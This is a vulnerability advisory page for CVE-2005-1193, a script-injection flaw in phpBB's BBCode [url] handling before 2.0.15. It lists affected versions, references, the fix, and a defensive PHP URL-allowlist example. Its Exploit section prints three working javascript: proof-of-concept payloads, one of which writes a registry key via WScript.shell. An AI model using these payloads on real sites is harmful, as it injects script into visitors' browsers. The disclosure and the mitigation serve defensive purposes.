CVE-2005-1193
CVSS 7.5
Published: 2005-05-16 00:00:00
Last revised: 2016-10-17 23:17:58

[Original] The bbencode_second_pass and make_clickable functions in bbcode.php for phpBB before 2.0.15, as used in viewtopic.php, privmsg.php, and other scripts, allow remote attackers to execute arbitrary script via a BBcode tag with a (1) javascript:, (2) applet:, (3) about:, (4) activex:, (5) chrome:, or (6) script: URI scheme, as demonstrated using the URL tag.


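[CNNVD] PHPBB URL Tag BBCode.PHP Vulnerability (CNNVD-200505-1069)

The bbencode_second_pass and make_clickable functions in bbcode.php in phpBB versions before 2.0.15, when used by viewtopic.php, privmsg.php and other scripts, allow remote attackers to execute arbitrary script through a BBcode tag carrying a (1) javascript:, (2) applet:, (3) about:, (4) activex:, (5) chrome: or (6) script: URI scheme, for example by using the URL tag.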

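- CVSS (Base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected platforms and products)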

cpe:/a:phpbb_group:phpbb:2.0.12
cpe:/a:phpbb_group:phpbb:2.0.4
cpe:/a:phpbb_group:phpbb:2.0.11
cpe:/a:phpbb_group:phpbb:2.0.5
cpe:/a:phpbb_group:phpbb:2.0.10
cpe:/a:phpbb_group:phpbb:2.0.2
cpe:/a:phpbb_group:phpbb:2.0.3
cpe:/a:phpbb_group:phpbb:2.0.0
cpe:/a:phpbb_group:phpbb:2.0.1
cpe:/a:phpbb_group:phpbb:2.0_rc1
cpe:/a:phpbb_group:phpbb:2.0_rc2
cpe:/a:phpbb_group:phpbb:2.0.6d
cpe:/a:phpbb_group:phpbb:2.0_rc3
cpe:/a:phpbb_group:phpbb:2.0.6c
cpe:/a:phpbb_group:phpbb:2.0_rc4
cpe:/a:phpbb_group:phpbb:2.0.7a
cpe:/a:phpbb_group:phpbb:2.0.8a
cpe:/a:phpbb_group:phpbb:2.0_beta1
cpe:/a:phpbb_group:phpbb:2.0.8
cpe:/a:phpbb_group:phpbb:2.0.9
cpe:/a:phpbb_group:phpbb:2.0.14
cpe:/a:phpbb_group:phpbb:2.0.6
cpe:/a:phpbb_group:phpbb:2.0.13
cpe:/a:phpbb_group:phpbb:2.0.7

- OVAL (Technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1193
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1193
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1069
(Official data source) CNNVD

- Other links and resources

http://castlecops.com/t123194-.html
(UNKNOWN)  MISC  http://castlecops.com/t123194-.html
http://marc.info/?l=full-disclosure&m=111552510000088&w=2
(UNKNOWN)  FULLDISC  20050508 phpbb 2.0.15 released - patches high critical vuln
http://seclists.org/lists/bugtraq/2005/May/0098.html
(UNKNOWN)  BUGTRAQ  20050507 phpbb 2.0.15 released - patches high critical vuln
http://securitytracker.com/id?1013918
(PATCH)  SECTRACK  1013918
http://securitytracker.com/id?1014117
(UNKNOWN)  SECTRACK  1014117
http://www.kb.cert.org/vuls/id/113196
(UNKNOWN)  CERT-VN  VU#113196
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=288194
(PATCH)  CONFIRM  http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=288194
http://www.securityfocus.com/bid/13545
(PATCH)  BID  13545
http://xforce.iss.net/xforce/xfdb/20574
(UNKNOWN)  XF  phpbb-url-bbcode-file-include(20574)

- Vulnerability information

PHPBB URL Tag BBCode.PHP Vulnerability
High risk  Input validation
2005-05-16 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

The vendor has released an upgrade to fix this security issue. Every affected version listed below is fixed by phpBB Group phpBB 2.0.15, available from http://www.phpbb.com/downloads.php:
phpBB Group phpBB 2.0 RC1
phpBB Group phpBB 2.0 RC3
phpBB Group phpBB 2.0 RC4
phpBB Group phpBB 2.0 Beta 1
phpBB Group phpBB 2.0 RC2
phpBB Group phpBB 2.0 .0
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0.10
phpBB Group phpBB 2.0.11
phpBB Group phpBB 2.0.12
phpBB Group phpBB 2.0.13
phpBB Group phpBB 2.0.14
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.3
phpBB Group phpBB 2.0.4
phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.6
phpBB Group phpBB 2.0.6 c
phpBB Group phpBB 2.0.6 d
phpBB Group phpBB 2.0.7
phpBB Group phpBB 2.0.7 a
phpBB Group phpBB 2.0.8 a
phpBB Group phpBB 2.0.8
phpBB Group phpBB 2.0.9

- Vulnerability information

16439
phpBB bbcode.php make_clickable() Function BBcode URL Arbitrary Script Execution
Remote / Network Access
Impact Unknown Upgrade
Vendor Verified

- Vulnerability description

Unknown or Incomplete

- Timeline

2005-05-09 Unknown
Unknown Unknown

- Solution

Upgrade to version 2.0.15 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

PHPBB URL Tag BBCode.PHP Vulnerability
Input Validation Error 13545
Yes No
2005-05-09 12:00:00 2009-07-12 02:06:00
Discovery of this issue is credited to Papados.

- Affected software versions

phpBB Group phpBB 2.0.14
phpBB Group phpBB 2.0.13
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
phpBB Group phpBB 2.0.12
phpBB Group phpBB 2.0.11
phpBB Group phpBB 2.0.10
phpBB Group phpBB 2.0.9
phpBB Group phpBB 2.0.8 a
phpBB Group phpBB 2.0.8
phpBB Group phpBB 2.0.7 a
phpBB Group phpBB 2.0.7
phpBB Group phpBB 2.0.6 d
phpBB Group phpBB 2.0.6 c
phpBB Group phpBB 2.0.6
phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.4
phpBB Group phpBB 2.0.3
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0 .0
phpBB Group phpBB 2.0 RC4
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache 1.3.9
phpBB Group phpBB 2.0 RC3
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache 1.3.9
phpBB Group phpBB 2.0 RC2
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache 1.3.9
phpBB Group phpBB 2.0 RC1
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache 1.3.9
phpBB Group phpBB 2.0 Beta 1
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache 1.3.9
phpBB Group phpBB 2.0.15

- Unaffected software versions

phpBB Group phpBB 2.0.15

- Vulnerability discussion

The phpBB vendor reports that a critical vulnerability exists in the BBCode handling routines of the 'bbcode.php' script.

User-supplied input in the BBCode [url] tag is not properly sanitized. This could permit the injection of arbitrary HTML or script code into the browser of an unsuspecting user in the context of the affected site.
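
The scheme check that the [url] handling lacked can be expressed as an allowlist rather than a list of known-bad schemes. The following is an added example, not phpBB's code or its 2.0.15 patch; the function names, the allowed-scheme policy and the sample posts are assumptions made for illustration.

```php
<?php
// Added example: a hypothetical renderer, not phpBB's bbcode.php.
// Schemes a [url] tag may link to (an assumed policy; adjust per site).
const ALLOWED_SCHEMES = ['http', 'https', 'ftp'];

// True only for absolute URLs whose scheme is on the allowlist.
function is_allowed_url(string $url): bool
{
    // Whitespace and control characters can hide a scheme from naive matching.
    if (preg_match('/[\x00-\x20\x7f]/', $url)) {
        return false;
    }
    // No explicit "scheme://" prefix: reject rather than guess.
    if (!preg_match('#^([a-z][a-z0-9+.\-]*)://#i', $url, $m)) {
        return false;
    }
    return in_array(strtolower($m[1]), ALLOWED_SCHEMES, true);
}

function render_url_tags(string $post): string
{
    // Escape the whole post first so neither URL nor label can break out of the markup.
    $escaped = htmlspecialchars($post, ENT_QUOTES, 'UTF-8');
    return preg_replace_callback(
        '#\[url=([^\]]+)\](.*?)\[/url\]#is',
        static function (array $m): string {
            if (!is_allowed_url($m[1])) {
                return $m[0]; // leave the tag as inert, already-escaped text
            }
            return '<a href="' . $m[1] . '" rel="nofollow noopener">' . $m[2] . '</a>';
        },
        $escaped
    );
}

// Constructed sample posts using schemes named in the advisory.
$samples = [
    '[url=https://example.org/?a=1&b=2]allowed[/url]',
    '[url=javascript:void(0)]blocked[/url]',
    '[url=JaVaScRiPt://%0Avoid(0)]blocked, mixed case[/url]',
    '[url=about:blank]blocked[/url]',
];
foreach ($samples as $s) {
    echo render_url_tags($s), PHP_EOL;
}
```

Only the first sample is rendered as a link; the other three stay as escaped text because their schemes are not on the allowlist, regardless of letter case or a following `//`.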

- Exploit

An exploit is not required.

The following proofs of concept are available:
[url=javascript://%0ASh=alert(%22CouCou%22);window.close();]Alert box with "CouCou"[/url]

[url=javascript://%0ASh=new%20ActiveXObject(%22WScript.shell%22);Sh.regwrite(%22HKCU%5C%5CQQQQQ%5C%5Cqq%22,%22CouCou%22)
;window.close();]Create registry entry: HKCU\QQQQQ\qq = "CouCou"[/url]

[url=javascript://%0Awindow.opener.document.body.innerHTML=window.opener.document.body.innerHTML.replace(%27Hi%20Paul%27
,%27Hi%20P.A.U.L%27);window.close();]Modify opener page: Paul -> P.A.U.L[/url]

- Solution

The vendor has released version 2.0.15 to address this issue.


phpBB Group phpBB 2.0 RC1
phpBB Group phpBB 2.0 RC3
phpBB Group phpBB 2.0 RC4
phpBB Group phpBB 2.0 Beta 1
phpBB Group phpBB 2.0 RC2
phpBB Group phpBB 2.0 .0
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0.10
phpBB Group phpBB 2.0.11
phpBB Group phpBB 2.0.12
phpBB Group phpBB 2.0.13
phpBB Group phpBB 2.0.14
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.3
phpBB Group phpBB 2.0.4
phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.6
phpBB Group phpBB 2.0.6 c
phpBB Group phpBB 2.0.6 d
phpBB Group phpBB 2.0.7
phpBB Group phpBB 2.0.7 a
phpBB Group phpBB 2.0.8 a
phpBB Group phpBB 2.0.8
phpBB Group phpBB 2.0.9
